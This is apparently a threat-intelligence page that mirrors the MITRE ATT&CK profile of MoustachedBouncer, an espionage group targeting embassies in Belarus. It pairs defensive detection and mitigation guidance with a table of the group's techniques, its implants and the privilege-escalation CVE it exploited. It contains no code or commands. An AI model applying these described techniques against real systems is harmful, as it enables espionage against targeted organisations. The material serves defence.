G1019: MoustachedBouncer
MoustachedBouncer is a cyberespionage group that has been active since at least 2014 targeting foreign embassies in Belarus.[1]
Analyst context for executives and security teams
MoustachedBouncer matters because ATT&CK identifies it as a long-running cyberespionage group targeting foreign embassies in Belarus, with related custom Windows implants and techniques spanning initial access, execution, stealth, collection, command and control, and privilege escalation. For leaders, the decision value is not broad exposure by default; it is whether diplomatic, government-facing, Belarus-related, or similarly sensitive operations have the visibility and response readiness to detect targeted content injection, script execution, packed tooling, data staging, and covert network routing.
Executive priority
Treat this as a targeted-espionage readiness question rather than a generic malware alert. Executives should ask whether high-sensitivity users and locations have defensible endpoint, network, and incident-response coverage; whether vulnerability management can reduce privilege-escalation paths; and whether audit evidence exists for PowerShell/script controls, egress monitoring, and investigation of suspected data collection. Priority is highest for organizations with diplomatic, governmental, regional, or sensitive-policy exposure connected to Belarus or comparable threat models.
Technical view
ATT&CK provides no official detection text for the group, so SOC and IR teams should validate coverage through the related behaviors and software: Disco, SharpDisco, and NightClub are associated custom implants/dropper activity, with related Windows relevance for the software. Detection engineering should focus on suspicious PowerShell and JavaScript execution, packed or obfuscated executables, C#/.NET dropper or plugin-loading patterns, abnormal screenshot collection, privilege-escalation exploit indicators, remote data staging, proxy-like command-and-control paths, and signs of content injection in network traffic. Because the group object itself has no platforms or tactics listed, scope detection logic from the linked software and techniques rather than assuming enterprise-wide platform applicability.
Likely telemetry
- Endpoint process creation and command-line telemetry, especially for PowerShell, Windows Script Host/JScript, and unusual child-process chains
- Script block, module, and PowerShell operational logs where available
- Endpoint file creation, module load, and executable metadata useful for identifying packed, obfuscated, C#/.NET, or C++ implant-like artifacts
- EDR or operating-system telemetry for screen capture behavior and suspicious API or utility use
- Vulnerability and patch-state records to assess privilege-escalation exposure
Detection direction
- Build coverage around the linked techniques rather than the group name alone; group-level ATT&CK detection guidance is not provided.
- Tune PowerShell and JavaScript detections for suspicious execution context, encoded or obfuscated content, unusual parent processes, and post-compromise automation while accounting for legitimate administration.
- Validate controls against packed or obfuscated executables using behavior and memory/runtime indicators, not only static signatures.
- Hunt for plugin-loading or modular implant patterns associated with droppers and implants, especially on Windows systems given the related software platform data.
- Correlate suspected content injection with endpoint execution and network path evidence; blind spots often exist where organizations lack full proxy, TLS inspection metadata, or upstream network visibility.
Mitigation priorities
- Start with asset and exposure scoping: identify sensitive users, diplomatic/government-facing operations, Belarus-related business context, and high-value Windows endpoints.
- Ensure endpoint and network logging is retained long enough to support espionage investigations, including script execution, file activity, and egress telemetry.
- Harden PowerShell and script execution through least privilege, administrative control, logging, and approved-use baselines.
- Prioritize vulnerability remediation for systems where privilege escalation would materially increase access to sensitive data or operations.
- Use application control, attachment/content handling controls, and malware prevention to reduce execution of unknown packed or custom tooling.
Analyst notes and limits
The most actionable ATT&CK context comes from the relationships: MoustachedBouncer uses Disco, SharpDisco, NightClub, and techniques including Software Packing, PowerShell, JavaScript, Exploitation for Privilege Escalation, Remote Data Staging, Proxy, Screen Capture, Content Injection, and a mobile-domain naming/location evasion technique. The official description cites activity since at least 2014 targeting foreign embassies in Belarus. Use this profile to guide threat-informed validation for organizations with relevant geopolitical or sensitive-information exposure.
The supplied group object has no official detection text, no listed platforms, and no group-level tactics. Platform and behavior inferences should therefore be limited to the provided relationships, especially the Windows association for related software and the platforms listed on related techniques. Local environment telemetry, business exposure, and threat intelligence are required before determining material risk or detection coverage.
MoustachedBouncer
MoustachedBouncer is a cyberespionage group that has been active since at least 2014 targeting foreign embassies in Belarus.[1]
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
Techniques used
This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.
| Domain | ID | Name | Relationship / procedure |
|---|---|---|---|
| Enterprise | T1059.001 | PowerShell Sub-technique | MoustachedBouncer has used plugins to execute PowerShell scripts.CitationMoustachedBouncer ESET August 2023 |
| Enterprise | T1059.007 | JavaScript Sub-technique | MoustachedBouncer has used JavaScript to deliver malware hosted on HTML pages.CitationMoustachedBouncer ESET August 2023 |
| Enterprise | T1027.002 | Software Packing Sub-technique | MoustachedBouncer has used malware plugins packed with Themida.CitationMoustachedBouncer ESET August 2023 |
| Enterprise | T1113 | Screen Capture | MoustachedBouncer has used plugins to take screenshots on targeted systems.CitationMoustachedBouncer ESET August 2023 |
| Enterprise | T1090 | Proxy | MoustachedBouncer has used a reverse proxy tool similar to the GitHub repository revsocks.CitationMoustachedBouncer ESET August 2023 |
| Enterprise | T1068 | Exploitation for Privilege Escalation | MoustachedBouncer has exploited CVE-2021-1732 to execute malware components with elevated rights.CitationMoustachedBouncer ESET August 2023 |
| Enterprise | T1074.002 | Remote Data Staging Sub-technique | MoustachedBouncer has used plugins to save captured screenshots to `.\AActdata\` on an SMB share.CitationMoustachedBouncer ESET August 2023 |
| Enterprise | T1659 | Content Injection | MoustachedBouncer has injected content into DNS, HTTP, and SMB replies to redirect specifically-targeted victims to a fake Windows Update page to download malware.CitationMoustachedBouncer ESET August 2023 |
Groups, software, and campaigns
S1090: NightClub
NightClub is a modular implant written in C++ that has been used by MoustachedBouncer since at least 2014.[1]
S1088: Disco
Disco is a custom implant that has been used by MoustachedBouncer since at least 2020 including in campaigns using targeted malicious content injection for initial access and command and control.[1]
S1089: SharpDisco
SharpDisco is a dropper developed in C# that has been used by MoustachedBouncer since at least 2020 to load malicious plugins.[1]
All related ATT&CK context
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates .
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | 1.0 | Current bundle | 89fccc64214a… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
-
[1]
MoustachedBouncer ESET August 2023
Faou, M. (2023, August 10). MoustachedBouncer: Espionage against foreign diplomats in Belarus. Retrieved September 25, 2023.
Open source URL -
[2]
mitre-attack G1019Open source URL
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.